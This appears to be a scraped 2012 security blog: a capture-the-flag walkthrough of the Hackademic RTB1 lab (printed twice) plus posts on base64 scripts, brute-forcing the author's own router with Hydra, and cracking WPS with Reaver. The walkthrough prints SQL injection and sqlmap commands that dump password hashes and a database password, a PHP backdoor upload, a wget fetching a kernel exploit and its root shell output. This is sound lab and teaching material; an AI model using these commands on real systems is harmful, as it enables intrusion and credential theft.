Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
OK. It seems to be running Fedora (2.2.15) with Apache as a Web Server.
Lets look at the webpages with a browser.
OK. Lets view the source of the page. http://192.168.140.133/Hackademic_RTB1/
Seems it is running WordPress 1.5.1.1
I could now run a vulnerability scan and look for exploits for automated attack, but i wanted to see if i can do something manually first.
Tempted to start attacking, we are still gathering information. It is important to get all information before running any kind of attack for best results.
More clicking. Clicked on the uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Lets add an ' to the end of the URL. and try cat=0 and so on..
Ooops. i found something. A MySQL backend :)
A table named wp_categories.
Lets find out how the table is setup and see how many columns the table has. We can do this by using the order by technique..
added: order by 1 to the end of the cat=0 statement
Seems to have at least one column.
added order by 2. Still ok
added order by 3. Still ok
added order by 4. Still ok
added order by 5. Still ok
added order by 6.
OK. From this we know that the table has 5 columns.
Using SQL union to find what column we can use for SQL command injection.
Seems that column 2 is something we can use.
Lets find out the version of the MySQL database using version()
It is running MySQL 5.1.47
More useful system commandsdatabase() Returns "wordpress"
user() Returns "root@localhost"
load_file() Lets see if we can browse local files.
Did not work with ascii /etc/hosts. Lets try with hex..
/etc/hosts converted to hex is 2f6574632f686f737473
It works! We get the hosts file.
We can also look for /etc/passwd to enumerate useraccounts and much more..
We can do alot manually, but it is easier to use some tools.
Lets try sqlmap
Lets get some tables
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema)
Very useful
Lets extract columns for the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
Now lets list all users and password hashes for users in wp_users table.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass | user_login | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames | 1 | James | Nick |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky | 0 | Bucky | Max |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10 | Miller | George |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0 | Konnors | Jason |
| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack | 0 | Black | Tony |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 | Smith | John |
+----------------------------------+--------------+------------+---------------+----------------+
We can go ahead and crack them also:
Interesting to note that user_level might be authorization level. So 10 could be the highest.
So now we have user accounts and their passwords, but we still do not have the root DBA password.
I know that the password is configured in some file somewhere on the system.
So Google is my friend.
Searched for "wordpress configuration file" and came up with the config filename wp-config.php
But i do not know the location, yet.
The httpd.conf could be helpful
After some trial and error and browsing the web for default location i tried.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained.
DocumentRoot "/var/www/html"
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //\r
define('DB_NAME', 'wordpress'); // The name of the database\r
define('DB_USER', 'root'); // Your MySQL username\r
define('DB_PASSWORD', 'lz5yedns'); // ...and password\r
So how do I login?
Googled some more and found that the admin login interface is /wp-admin
We cracked the passwords earlier so lets login with the useraccount with the highest user_level (GeorgeMiller)
after some looking around in wordpress admin gui.
Found that uploading was disabled. As an administrator i enabled uploading of php files.
Modified a php backdoor
Activate a shell listener. and clicked on the uploaded special.php.
We have a shell!! running as the apache user.
Now we could upload metasploit meterpreters for pivoting, but since the goal is to root the box we focus on that.
We can also start password guessing, using sucrack to crack the root password.
Lets see if the system is vulnerable first.
sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
My best guess is finding a matching local privilege escalation exploit in exploitdb.
Found a few good candidate exploits..
So i started to compile and test them out.
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
Compile and upload the exploit
sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35-- http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'
0K .......... .. 100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
4 drwxrwxrwt 6 root root 4096 Sep 6 04:47 .
4 dr-xr-xr-x 22 root root 4096 Sep 6 04:05 ..
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .ICE-unix
4 -r--r--r-- 1 root root 11 Sep 6 04:05 .X0-lock
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .X11-unix
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 orbit-gdm
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx 1 apache apache 12474 Sep 6 2012 rtb1
16 -rw-rw-rw- 1 apache apache 12503 Sep 6 2012 rtb1-rds
sh-4.0$ chmod +x rtb1-rds
EXPLOIT
sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
Regards,
mr.pr0n || p0wnbox.Team || 2011
MISSION ACCOMPLISHED!!!
A while back i started to research web app pentesting and managed to get through the DVWA hackademic challenges, an excellent way to learn Web App Pentesting by the way.
I did not post a blog entry for this. Will maybe do that later on.
I kind of felt that my skills within this area started to become rusty so I got active again and brought on another Challenge. The RTB1.
Root this box version 1, a VMware on linux running a webserver with backend database and applications.
I did not know what to expect so i began to explore..
First setting up the environment needed in VMware with host-only networking.
- RTB1
- My evil attack machine Running BT5R2
First i started off with SCANNING AND INFORMATION GATHERING.A really important step in the process of Penetration testing.
Since i know that the host is on my local subnet i do a simple ARP-scan to find the host.
root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.
Wonderful, we have the IP-address. Next...
PORTSCAN, WHAT IS IT RUNNING?
root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
OK. A webserver, how surprising :) Lets find out more..
BANNER GRABBING
root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
OK. It seems to be running Fedora (2.2.15) with Apache as a Web Server.
Lets look at the webpages with a browser.
OK. Lets view the source of the page. http://192.168.140.133/Hackademic_RTB1/
Seems it is running WordPress 1.5.1.1
I could now run a vulnerability scan and look for exploits for automated attack, but i wanted to see if i can do something manually first.
Tempted to start attacking, we are still gathering information. It is important to get all information before running any kind of attack for best results.
More clicking. Clicked on the uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Lets add an ' to the end of the URL. and try cat=0 and so on..
Ooops. i found something. A MySQL backend :)
A table named wp_categories.
Lets find out how the table is setup and see how many columns the table has. We can do this by using the order by technique..
added: order by 1 to the end of the cat=0 statement
Seems to have at least one column.
added order by 2. Still ok
added order by 3. Still ok
added order by 4. Still ok
added order by 5. Still ok
added order by 6.
OK. From this we know that the table has 5 columns.
Using SQL union to find what column we can use for SQL command injection.
Seems that column 2 is something we can use.
Lets find out the version of the MySQL database using version()
It is running MySQL 5.1.47
More useful system commandsdatabase() Returns "wordpress"
user() Returns "root@localhost"
load_file() Lets see if we can browse local files.
Did not work with ascii /etc/hosts. Lets try with hex..
/etc/hosts converted to hex is 2f6574632f686f737473
It works! We get the hosts file.
We can also look for /etc/passwd to enumerate useraccounts and much more..
We can do alot manually, but it is easier to use some tools.
Lets try sqlmap
Lets get some tables
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema)
Very useful
Lets extract columns for the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
Now lets list all users and password hashes for users in wp_users table.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass | user_login | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames | 1 | James | Nick |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky | 0 | Bucky | Max |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10 | Miller | George |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0 | Konnors | Jason |
| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack | 0 | Black | Tony |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 | Smith | John |
+----------------------------------+--------------+------------+---------------+----------------+
We can go ahead and crack them also:
Interesting to note that user_level might be authorization level. So 10 could be the highest.
So now we have user accounts and their passwords, but we still do not have the root DBA password.
I know that the password is configured in some file somewhere on the system.
So Google is my friend.
Searched for "wordpress configuration file" and came up with the config filename wp-config.php
But i do not know the location, yet.
The httpd.conf could be helpful
After some trial and error and browsing the web for default location i tried.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained.
DocumentRoot "/var/www/html"
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //\r
define('DB_NAME', 'wordpress'); // The name of the database\r
define('DB_USER', 'root'); // Your MySQL username\r
define('DB_PASSWORD', 'lz5yedns'); // ...and password\r
So how do I login?
Googled some more and found that the admin login interface is /wp-admin
We cracked the passwords earlier so lets login with the useraccount with the highest user_level (GeorgeMiller)
after some looking around in wordpress admin gui.
Found that uploading was disabled. As an administrator i enabled uploading of php files.
Modified a php backdoor
Activate a shell listener. and clicked on the uploaded special.php.
We have a shell!! running as the apache user.
Now we could upload metasploit meterpreters for pivoting, but since the goal is to root the box we focus on that.
We can also start password guessing, using sucrack to crack the root password.
Lets see if the system is vulnerable first.
sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
My best guess is finding a matching local privilege escalation exploit in exploitdb.
Found a few good candidate exploits..
So i started to compile and test them out.
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
Compile and upload the exploit
sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35-- http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'
0K .......... .. 100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
4 drwxrwxrwt 6 root root 4096 Sep 6 04:47 .
4 dr-xr-xr-x 22 root root 4096 Sep 6 04:05 ..
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .ICE-unix
4 -r--r--r-- 1 root root 11 Sep 6 04:05 .X0-lock
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .X11-unix
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 orbit-gdm
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx 1 apache apache 12474 Sep 6 2012 rtb1
16 -rw-rw-rw- 1 apache apache 12503 Sep 6 2012 rtb1-rds
sh-4.0$ chmod +x rtb1-rds
EXPLOIT
sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
Regards,
mr.pr0n || p0wnbox.Team || 2011
MISSION ACCOMPLISHED!!!
Sunday, September 2, 2012
Python simple base64 encode/decode script
I found the need of encoding and decoding base64 values fast from stdin to stdout (without GUI-crap) and started to look around for tools and i could find a bunch of them, but most of them were with advanced options and parameters.
Sometimes simple is enough so i wrote two scripts and included them in my PATH statement.
----------------------------------
# Base64 Encode stdin to stdout
#! /usr/bin/python
# Filename: b64enc.py
import base64
import sys
base64encoded = base64.b64encode(sys.stdin.read())
print base64encoded
----------------------------------
# Base64 Decode stdin to stdout
#! /usr/bin/python
# Filename b64dec.py
import base64
import sys
base64decoded = base64.b64decode(sys.stdin.read())
print base64decoded
Example:
Enjoy!
Sometimes simple is enough so i wrote two scripts and included them in my PATH statement.
----------------------------------
# Base64 Encode stdin to stdout
#! /usr/bin/python
# Filename: b64enc.py
import base64
import sys
base64encoded = base64.b64encode(sys.stdin.read())
print base64encoded
----------------------------------
# Base64 Decode stdin to stdout
#! /usr/bin/python
# Filename b64dec.py
import base64
import sys
base64decoded = base64.b64decode(sys.stdin.read())
print base64decoded
Example:
Enjoy!
Friday, August 31, 2012
Brute-forcing with Hydra
Hydra is a great tool for brute-forcing. With this tool it is possible to brute-force most websites and protocols.
Protocols supported:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, SOCKS5, SSH(v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Can be found here: Hydra (http://www.thc.org/thc-hydra)
I dediced to see if it possible to brute-force my home AccessPoint administation login page.
Below is what i did.
First i started to examine the login page.
Basic, form-based etc.. There are a few ways of finding this out.
Using wireshark and intercept a login session gives a LOT of useful information.
Tried to login with a password while sniffing the traffic with wireshark, the password was incorrect (as suspected), but from this information we can see what variables are used for logging in.
Analyzing the sniffer output with "Follow TCP stream" i could see the following:
I was looking for what happens after the submit button was pressed and also what is sent in HTTP-POST. Found the variable pws indicating that this is used for password input.
Found an interesting variable: "dw(wrhtpsswd)" What does this do?
As we can see the password is base64 encoded as it is sent to the AP.
We can see that the length is 9 characters, max size is 12 characters.
Next step was further analysis with Mantra to examine web content.
DOM tab is an excellent way of analyzing variables and their associations.
This parameter wrhtpsswd sounds familiar. Incorrect password...
For a successful attack with Hydra we need to know the variable that submits the password and string included with it.
We also need to know the error message sent to us when entering an incorrect password.
From wireshark output we could not clearly see the Incorrect password message, but instead the AP sends a dw(wrhtpsswd) that DOM identified as the "Incorrect Password, Please confirm your password and try again" message.
Awesome, we can now go ahead and start the attack.
hydra parameters:
-l "" # There is no username required
-P PASSWORDS.TXT # Password file (in base64 encoded format)
-t #How many simultanious tasks
-f # Exit after the first found password
-v / -V # Verbose. Show every password combination
IP-address # you know
http-post-form # Method used
/login.cgi # The login page of the AP
"page=&logout=&action=submit # The string sent simulating a click on Submit button &pws=^PASS^%3D&itsbutton1=Submit&h_language=en" #pws from PASS in PASSWORDS.TXT
wrhtpsswd # The string to look for in the response when an incorrect password is entered
Awesome! Mission accomplished!
Hydra can be very time consuming depending on the size of the wordlist. A lot of options you can tweak for best timing and results. Play with it. Anything is possible, if not try harder.
A good source for common password lists can be obtained from SkullSecurity.
http://www.skullsecurity.org/wiki/index.php/Passwords
If you need to create your own custom password list Crunch is the way to go.
Excellent tool also included in Backtrack distributions or download it from Sourceforge.
http://sourceforge.net/projects/crunch-wordlist/
A good how-to can be found here.
http://adaywithtape.blogspot.se/2011/05/creating-wordlists-with-crunch-v30.html
Til next time. Bye for now!
/M
Wednesday, August 29, 2012
Wireless Hacking: Hacking WPS enabled AccessPoints
Just when you think you are safe with WPA2 and a PSK over 20 characters long something like this comes along.
It seems that most vendors have WPS enabled as a default setting, so was my Belkin home AP.
In this tutorial i will go through the steps of how i hacked my WPS enabled AccessPoint.
For more information about WPS (Wifi protected Setup) see:
Prerequisites:
- A wireless card supporting monitor mode
- Backtrack distribution: (I used Backtrack 5 R2) or
Reaver WPS from http://code.google.com/p/reaver-wps/
First you need to set your wireless card in monitor mode:
To find WPS enabled accesspoints we can use the command "wash" included in Backtrack 5
- A wireless card supporting monitor mode
- Backtrack distribution: (I used Backtrack 5 R2) or
Reaver WPS from http://code.google.com/p/reaver-wps/
First you need to set your wireless card in monitor mode:
To find WPS enabled accesspoints we can use the command "wash" included in Backtrack 5
This command also shows if the WPS is locked, the channel the AP is running on and the BSSID and ESSID of the AP as well as RSSI which is the receive signal strength.
Above we see an AP on Channel 6 with ESSID: SSID-1 that has WPS version 1.0 enabled and RSSI of -30 which means we are close to the AP.
Brute forcing WPS PIN:
open 2 command windows.
In window 1 run:
Explainations to reaver command-line : -c channel, -A no association, -E Send EAP terminate, -N no acks, -vv very verbose (if you want to see all login attempts)
In window 2 run:
You might need to test the appropriate timing values depending on how close you are to the AP.
After a long while you should see this in window 1
For some reason i do not always get the WPA PSK echoed out like above. After a long while you should see this in window 1
What you can do then is to test the PIN with:
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -p <PIN>
After the PIN is discovered and verified. Get WPA-PSK with the below method.
Create a wpa_supplicant.conf including the lines below
Run wpa_supplicant
Run wpa_cli
wpa_cli wps_reg <BSSID> <PIN> # wait for CONNECTED
save_config
Check your saved wpa_supplicant.conf with
cat wpa_supplicant.conf
It should now show you the PSK in clear text.
Hope you find the above useful.
Note:
I wrote this tutorial for reference and in good intentions.
Before you go ahead and hack your neighbours AP ask for permission!
I am not responsible what you do with the above information!
Cheers.
/M
Subscribe to:
Posts (Atom)